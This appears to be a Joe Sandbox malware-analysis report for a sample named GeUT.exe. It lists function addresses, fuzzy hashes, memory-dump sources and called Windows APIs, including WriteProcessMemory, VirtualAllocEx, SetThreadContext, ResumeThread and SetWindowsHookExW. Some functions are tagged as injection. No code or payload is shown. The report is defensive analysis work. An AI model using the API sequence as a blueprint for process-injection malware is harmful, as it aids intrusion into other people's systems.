Instruction ID: 883db0951abcd91f544d842156e2799322dbfdd207ff327ecffe8df8273b9068
Opcode Fuzzy Hash: 3bc47c6dbb889d2e2871b43f328d1c0b1a6cad33a00dace12117b77a024f4121
Instruction Fuzzy Hash: 8D81C274C00269DFDF21CFA9C944BEDBBB5BB49300F1491AAE509B7250DB709A89CF54

Function 00C921F0 Relevance: 1.6, APIs: 1, Instructions: 114
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C922C6

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 55f195101c82ca0194e137da207c373a8ef3bcb0f683f305ed8dd9d12e33db95
Instruction ID: da2bbd8393bd521dd551bd0037956e168b7113cab2bd0bfb24ecfaa8419785f4
Opcode Fuzzy Hash: 55f195101c82ca0194e137da207c373a8ef3bcb0f683f305ed8dd9d12e33db95
Instruction Fuzzy Hash: F64197B5D04258DFCF00CFA9D984AEEFBF1BB49310F24902AE818B7210D374AA45CB64

Function 00C921F8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C922C6

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13cad3dd1af164a5b2177896d42ebb54245dca285f0d95717373e6c5f7f70fbd
Instruction ID: b2f7af4051fb9de76481933fdbdfae8eb56ebd227ba87d0e56ac2944b2c14d1b
Opcode Fuzzy Hash: 13cad3dd1af164a5b2177896d42ebb54245dca285f0d95717373e6c5f7f70fbd
Instruction Fuzzy Hash: B24166B9D04258DFCF00CFA9D984ADEFBF5BB49314F24902AE818B7210D375AA45CB64

Function 00C91FD0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C92085

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6f677e1882cc3849af2f5bd91213fe6f6e206026a8fc922f978225aed7fe3d24
Instruction ID: 9434603ab41b30744a0e6bd568301e919e959a2f2ec20c848d962652e4ef54b7
Opcode Fuzzy Hash: 6f677e1882cc3849af2f5bd91213fe6f6e206026a8fc922f978225aed7fe3d24
Instruction Fuzzy Hash: E34199B9D04258DFCF10CFAAD984ADEFBB1BB19310F14A02AE814B7210D375A945CF64

Function 00C920E8 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C92195

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f0fe96cf4713f8740e7c309517af5c66bcec861096a89d9e05a0b96ebde0432b
Instruction ID: 9c9623d6dda418774a3c44fee6d0c93dbf11b3306e5731c704cff3d43b24e080
Opcode Fuzzy Hash: f0fe96cf4713f8740e7c309517af5c66bcec861096a89d9e05a0b96ebde0432b
Instruction Fuzzy Hash: B03178B9D04258AFCF10CFA9D984ADEFBB5BB49310F10A01AE914B7310D375A915CF64

Function 00C91FD8 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C92085

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e1f290a4f09d53d3dadb11232562064b42f12ba3034b0921dcdb51ef28bdc44a
Instruction ID: a6378e10c55d326b949e2d8580d22848e62cc0536993582b2e0e67382a20c83a
Opcode Fuzzy Hash: e1f290a4f09d53d3dadb11232562064b42f12ba3034b0921dcdb51ef28bdc44a
Instruction Fuzzy Hash: C43167B9D04258DFCF10CFAAD984ADEFBB5BB19310F20A06AE814B7210D375A945CF64

Function 00C920F0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C92195

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5547ad5f928f202a71656acfb4c2b78f36ddb80e705b091f0c04bb5654ee7fb8
Instruction ID: 71909664f59c0a7745e145ab7f13f88dfc4dfa999e78a324946f9fc650aa92f8
Opcode Fuzzy Hash: 5547ad5f928f202a71656acfb4c2b78f36ddb80e705b091f0c04bb5654ee7fb8
Instruction Fuzzy Hash: 5C3155B9D042589FCF10CFA9D984A9EFBB5BB09310F10A02AE914B7310D375A955CF65

Function 00C91EC8 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00C91F72

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1b87012b01d1dea9bc70b01d9f0392c3cce4646caa17a0df396992969f135b61
Instruction ID: e009e33fa600ea69c0ff2dbfcab48c00d9609d896ea4465d625fd17eab20a696
Opcode Fuzzy Hash: 1b87012b01d1dea9bc70b01d9f0392c3cce4646caa17a0df396992969f135b61
Instruction Fuzzy Hash: E1319AB5D012599FCF10CFAAD984ADEFBF1BB49314F24906AE814B7210D378AA45CF64

Function 00C91EC1 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00C91F72

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8a095e5c11c8e9469057570777be985f8578784f40d1846bf917df52de6f5111
Instruction ID: 4f73957cc9f4facaf1e242181921426888d0ba34d59c651cfb53e53906c72f27
Opcode Fuzzy Hash: 8a095e5c11c8e9469057570777be985f8578784f40d1846bf917df52de6f5111
Instruction Fuzzy Hash: EB31CAB5D012599FCF10CFAAD884ADEFBF1BB49314F24806AE818B7250C378AA45CF54

Function 00C92331 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00C923AE

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d8b70ed4957dc903d0b93ac1f66ac64701587d49adc8d1e79fa1575ffffcc13e
Instruction ID: 1909a95ffb785b4c6ec14cdd709c5300a590e8980837d35c0059572218879a7f
Opcode Fuzzy Hash: d8b70ed4957dc903d0b93ac1f66ac64701587d49adc8d1e79fa1575ffffcc13e
Instruction Fuzzy Hash: 742188B9D002199FCB10CFA9D884ADEFBB4BB49314F24901AE915B7310D375A945CFA4

Function 00C92338 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00C923AE

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f48ff16c43f81c8154e1fb3c263db4ac8d8ddab2415d4e18da98f0a58a0559ff
Instruction ID: 8b39580e6e65de935dd769e55a694e688a3f7bf9ae57c13dd2f95a0b44095d8d
Opcode Fuzzy Hash: f48ff16c43f81c8154e1fb3c263db4ac8d8ddab2415d4e18da98f0a58a0559ff
Instruction Fuzzy Hash: 4C2199B8D002089FCB10CFA9D484ADEFBF4BB09320F20901AE914B3310D375A945CFA4

Function 00BFD5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147161094.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bfd000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e39c9bdb26fc2be5d323f04c424486d2791762b7d6f469ed4dd8889db8811d
Instruction ID: 3ccf299aa118b5a49947d940b90c0cf74c0adf256ed3545a923796d83ccb34e2
Opcode Fuzzy Hash: 22e39c9bdb26fc2be5d323f04c424486d2791762b7d6f469ed4dd8889db8811d
Instruction Fuzzy Hash: 15212872504208EFDB05DF14D9C0B36BFA6FB94314F2085ADEA094B256C736D85ACAA1

Function 00BFD5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147161094.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bfd000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: b08d8fb98bd23ae02174447df723800166ca4d1cc191345b1fa4a931497e69b2
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 5111D376504284DFCF15CF10D5C4B26BFB2FB94314F24C6A9D9094B256C33AD85ACBA2

Analysis Process: GeUT.exePID: 5512, Parent PID: 3784COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	147
Total number of Limit Nodes:	6

Executed Functions

Function 00AE90D2 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00AE915E
GetCurrentThread.KERNEL32 ref: 00AE919B
GetCurrentProcess.KERNEL32 ref: 00AE91D8
GetCurrentThreadId.KERNEL32 ref: 00AE9231

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 233cb8914f1de712e8148f400d47030e6447fad04a8c7dff319183aae319ceee
Instruction ID: 6e9c3dab7d982bb60b0ce7a24640f19653067033685da76e7643119307abb850
Opcode Fuzzy Hash: 233cb8914f1de712e8148f400d47030e6447fad04a8c7dff319183aae319ceee
Instruction Fuzzy Hash: D65175B090034A8FDB55CFAAD948BDEBBF1BF88314F248459E409A7360DB749944CF65

Function 00AE90E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00AE915E
GetCurrentThread.KERNEL32 ref: 00AE919B
GetCurrentProcess.KERNEL32 ref: 00AE91D8
GetCurrentThreadId.KERNEL32 ref: 00AE9231

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cd9076de4faf4e7098067ba46b6aa43eb08799580d7e8fa517b584a18172dc98
Instruction ID: c4adbcb3b2d47e15e4fdd1587204598dac816f60930f1ceb6bd3632c783fdf2b
Opcode Fuzzy Hash: cd9076de4faf4e7098067ba46b6aa43eb08799580d7e8fa517b584a18172dc98
Instruction Fuzzy Hash: 865154B490034A8FDB54CFAAD948BDEBBF1BF88314F248459E409A7360DB74A944CB65

Function 04EA2128 Relevance: 1.8, APIs: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 04EA221D

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 26749e1d108c4827da806c21fdbce7f08d6e2c4a6e236b030b78e21069612b50
Instruction ID: ad1bb6ad6d19919f25fab7e8146a88e56a586aa5bd8c1c6841513dada0d56663
Opcode Fuzzy Hash: 26749e1d108c4827da806c21fdbce7f08d6e2c4a6e236b030b78e21069612b50
Instruction Fuzzy Hash: 61E11971A002198FDB14DF64C844B9DB7B2BF85308F1184A9E909BF361DB71B99ACF50

Function 04EA2118 Relevance: 1.6, APIs: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 04EA221D

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7701e9304d69cf089dcacbfad36b8888de9011c10ca4f3236408bb86b783b358
Instruction ID: 4ebe750f280d1dce76a2f2d595235086978fced67415b88ba5eda5b9c30332ef
Opcode Fuzzy Hash: 7701e9304d69cf089dcacbfad36b8888de9011c10ca4f3236408bb86b783b358
Instruction Fuzzy Hash: DD513D74A00215CFDB24DF64C884B99B7B2FF84308F1044A9E619AB362DB71BD96CF50

Function 04EA9A24 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA9B42

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4ecfacaaefac2d4f09998647189f9b2b4a91c5ee6fedb316eb727015f852e57e
Instruction ID: 4ea81f8fa63e587d3c5c325ad537ee4eda74ec92eff27dbecb67b5004077fb93
Opcode Fuzzy Hash: 4ecfacaaefac2d4f09998647189f9b2b4a91c5ee6fedb316eb727015f852e57e
Instruction Fuzzy Hash: 1051E2B1D00349DFDB14CFA9C884ADEBFB5BF88314F64852AE819AB211D771A855CF90

Function 04EA9A30 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA9B42

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 18df2ed2bd904797dd2f2082aea21326c066f6c0d459c46a7a43929dd11a288c
Instruction ID: cd2aad70112bd5a98aa18d885ef466f221fdf571520ca7c89813345deead00eb
Opcode Fuzzy Hash: 18df2ed2bd904797dd2f2082aea21326c066f6c0d459c46a7a43929dd11a288c
Instruction Fuzzy Hash: 0541E0B1D00309DFDF14CF9AC884ADEBBB5BF88310F24852AE819AB210D775A855CF90

Function 04EA957C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04EAC0B1

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 80eca796b3f9163e9565cba0e8cf96c17bf92885ab4ef145242f501595ddbea4
Instruction ID: 2bf2e81ebf6bf433d44d69b19bd0962b3817bab203ce03fba687b16762c6dda0
Opcode Fuzzy Hash: 80eca796b3f9163e9565cba0e8cf96c17bf92885ab4ef145242f501595ddbea4
Instruction Fuzzy Hash: 2B4104B9A00209DFDB14CF99C488AAABBF5FF88314F248459D519AB321D775B851CFA0

Function 00AE9340 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AE93CF

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0afa656539b1b4e885aacb33fcd7256edb955e007a6305e1fef674d312e9529e
Instruction ID: 3c812b95bbbc4f257d1a93f7a02fc1b47d508973a06c767546899d7567083899
Opcode Fuzzy Hash: 0afa656539b1b4e885aacb33fcd7256edb955e007a6305e1fef674d312e9529e
Instruction Fuzzy Hash: 1A2103B58002499FDB10CFAAD984AEEBFF4FF48320F14811AE918A7351C375A950CF60

Function 00AE9348 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AE93CF

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c82ca5f173b5f00539ee4a3bd910e52dd421ee66dbafe0b89e1afc6b27e0b524
Instruction ID: f8d7a7d0029cbb1fd1a1bc5303891865017f06a7565551ba78cde5a8d295faa9
Opcode Fuzzy Hash: c82ca5f173b5f00539ee4a3bd910e52dd421ee66dbafe0b89e1afc6b27e0b524
Instruction Fuzzy Hash: 7921C4B59003499FDB10CFAAD984ADEBBF4FB48320F14841AE918A7350D375A954CFA5

Function 00AE3EC8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00AE3F4B

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 292e78eb33475183478373394b474326d0cee2c6847c3e3f8443fb8647b52ed7
Instruction ID: 9ccaf6003751c6d54c0cbd5ea475dc50b1adcdd89a0aaecb817e3509edab8c77
Opcode Fuzzy Hash: 292e78eb33475183478373394b474326d0cee2c6847c3e3f8443fb8647b52ed7
Instruction Fuzzy Hash: 4C211872D04249DFDB14CFAAD844BEEBBF5AF88310F14841AE419A7250C7B5A945CFA1

Function 04EA001F Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04EA00A6

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9755654b5c35f43a83aae627ad427ef4fe2cec49343d812fa734c243819f577e
Instruction ID: 3b18f71d9465d5129a831b3eea9de9f91c392075e8aa54866dc512ffa9acc819
Opcode Fuzzy Hash: 9755654b5c35f43a83aae627ad427ef4fe2cec49343d812fa734c243819f577e
Instruction Fuzzy Hash: 612147B6C003498FDB10CF9AC4847DEBBF0EF89324F10845AC459AB211D375A506CFA1

Function 00AE3ED0 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00AE3F4B

Memory Dump Source

Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 27c5b393b7f00331ef9f4b648ef0803424d49e3b31c6ff2de4de63595cf0a5c8
Instruction ID: 3f2e928758252c95b053be3171bb4fdff56a8d834636a16870d468e5b2500384
Opcode Fuzzy Hash: 27c5b393b7f00331ef9f4b648ef0803424d49e3b31c6ff2de4de63595cf0a5c8
Instruction Fuzzy Hash: 55211571D0024A9FDB14CFAAC844BDEBBF5AF88710F108429E419A7250C7B5A940CFA1

Function 04EA9464 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04EA9CD5

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: bc035fd4973e6b074a4dda8012b12e56d6f78bc2bffa0d14d737a2f1ab6bdba8
Instruction ID: b331d3f39a5a76d2f1cb4119b4e616a6e1c57f21d577beffcd47d9a6b5da3134
Opcode Fuzzy Hash: bc035fd4973e6b074a4dda8012b12e56d6f78bc2bffa0d14d737a2f1ab6bdba8
Instruction Fuzzy Hash: 941125B58006098FDB10CF9AC585BEEBBF8EB48320F208459D919B7201D3B4A954CFA5

Function 04EA0040 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04EA00A6

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b1b7cf1b3eecebc036c41b7fb0509e3c426ff2077edca7d499708b47cceb4a53
Instruction ID: 3d6b81fd029176e26dfd1dacf57ab2fcfef31dbed3ac3c4388643ed7b9595ada
Opcode Fuzzy Hash: b1b7cf1b3eecebc036c41b7fb0509e3c426ff2077edca7d499708b47cceb4a53
Instruction Fuzzy Hash: BA11DFB6C007498FDB10DF9AC444A9EFBF4AB88724F10842AD969A7210D3B9A545CFA5

Function 04EA9C71 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04EA9CD5

Memory Dump Source

Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: fd13ece918ddb7b7c9cdb9401679e8df2e230cc9bb4b346e2c076f9b1041809d
Instruction ID: 5a60a123d45ff130562b3186a63e1ca6eb81e473c930defe608ee0d2b35e4b80
Opcode Fuzzy Hash: fd13ece918ddb7b7c9cdb9401679e8df2e230cc9bb4b346e2c076f9b1041809d
Instruction Fuzzy Hash: 831125B58003098FDB10CF9AC545B9FFBF8EB48324F20841AD518A7201C374A940CFA5

Function 06140DF8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

,, xrefs: 06140E30

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 266019fb4e690b537483cb155b06ae50b04f13ae512045d047cf89e35133bb0d
Instruction ID: 6a7a1ab86d906e23781ef72813ea32aea29a6dace4dd470374f1788738f78bf0
Opcode Fuzzy Hash: 266019fb4e690b537483cb155b06ae50b04f13ae512045d047cf89e35133bb0d
Instruction Fuzzy Hash: 4141BF30B011048FDB44EFA5D45866EBBF1EF88311F14856AE506AB3A6DB71DC82CB95

Function 06140DE9 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

,, xrefs: 06140E30

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: b123db8cfc08dbaa6624c96f4c75e0f427b7f60ac7e57b04017a49e85bfc756e
Instruction ID: 7172351605afaba7d81bb94814261783e190afcc23bf6426a04f5128f0a63386
Opcode Fuzzy Hash: b123db8cfc08dbaa6624c96f4c75e0f427b7f60ac7e57b04017a49e85bfc756e
Instruction Fuzzy Hash: D331B030B02204CFDB44EFA5C45476EBBE1AF88311F14C56AD9069B3A6DB74DC82CB94

Function 06140F90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c720814d6109cc99bcf3c87eeb007455d8f03661a9ba7677176ada6c158da533
Instruction ID: 3b43eb84de32b5ef1c1fc2892963a29653668ec242fe551bf712f1000be63ebd
Opcode Fuzzy Hash: c720814d6109cc99bcf3c87eeb007455d8f03661a9ba7677176ada6c158da533
Instruction Fuzzy Hash: 33B18230B00300AFEB58BB75D951BBE77A7ABC9750F159428E902DB398DF34AC468791

Function 061404F4 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20bcde531aa3cf52db60cea0d0873a5612921537c52d5db36d0c14e7479dec64
Instruction ID: ba071466e0f62686358d2bdfd5742e9f42ca05a96cfaaa3cb9dac103fbbb5324
Opcode Fuzzy Hash: 20bcde531aa3cf52db60cea0d0873a5612921537c52d5db36d0c14e7479dec64
